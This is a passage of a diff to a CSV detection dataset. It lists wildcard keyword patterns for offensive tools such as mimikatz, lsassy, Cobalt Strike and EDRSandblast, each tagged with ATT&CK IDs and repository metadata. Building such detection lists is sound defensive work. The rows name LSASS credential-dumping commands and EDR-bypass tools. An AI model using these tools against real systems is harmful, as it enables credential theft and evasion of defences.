T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::secrets*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::setntlm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::trust*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::zerologon*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*lsarpc_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*LSASecretDefaultPassword*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*lsasecrets.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*lsasecrets.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" "*lsass comsvcs*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*lsass direct*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" -"*Lsass Dump File Created*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","9","1","39","3","2023-09-11T14:03:21Z","2022-09-13T12:42:13Z" +"*Lsass Dump File Created*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" "*lsass dump from agent*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" -"*LSASS dump might fail if RunAsPPL is enabled*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*LSASS dump might fail if RunAsPPL is enabled*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*lsass.dmp*","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*lsass.dmp*","offensive_tool_keyword","lsass","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","N/A","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*lsass.dmp*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*lsass.dmp*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*lsass.exe*.dmp*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","0","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" "*lsass.exe*C:\temp\tmp.tmp*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" "*lsass_*.dmp*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" -"*lsass_dump_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*lsass_dump_lsassy_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*lsass_dump_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*lsass_dump_lsassy_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*lsassdump.dmp*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" -"*LsassDump_20*.ps1*","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","983","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" -"*lsassdumps*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*LsassDump_20*.ps1*","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","984","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" +"*lsassdumps*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*LSASSProtectionBypass*/","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*LsassSilentProcessExit.cpp*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" -"*LsassSilentProcessExit.exe*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" -"*LsassSilentProcessExit.vcxproj*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" -"*LsassSilentProcessExit-master*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" -"*lsassy *","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*LsassSilentProcessExit.cpp*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*LsassSilentProcessExit.exe*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*LsassSilentProcessExit.vcxproj*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*LsassSilentProcessExit-master*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*lsassy *","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*lsassy -*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" "*lsassy -v -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*lsassy.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*lsassy/dumpmethod*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*lsassy_dump*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*lsassy_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*lsassy_dump.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*lsassy-linux-x64-*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*lsassy-MacOS-x64-*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*lsassy-windows-x64-*.exe","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*lse.sh -l*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*lsassy.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*lsassy/dumpmethod*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*lsassy_dump*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*lsassy_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*lsassy_dump.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*lsassy-linux-x64-*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*lsassy-MacOS-x64-*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*lsassy-windows-x64-*.exe","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*lse.sh -l*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" "*luckystrike.ps1*","offensive_tool_keyword","luckystrike","A PowerShell based utility for the creation of malicious Office macro documents.","T1566 - T1059 - T1027","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/curi0usJack/luckystrike","1","1","N/A","N/A","10","1084","250","2017-11-03T17:52:13Z","2016-09-22T18:57:50Z" "*LUgsLS1IT1NU*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*luijait/PwnKit*","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","79","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z" -"*luks2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*lures create *","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1308","237","2023-09-13T23:44:48Z","2022-09-07T02:47:43Z" +"*luks2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*lures create *","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" "*LVAsLS1QT1JU*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - 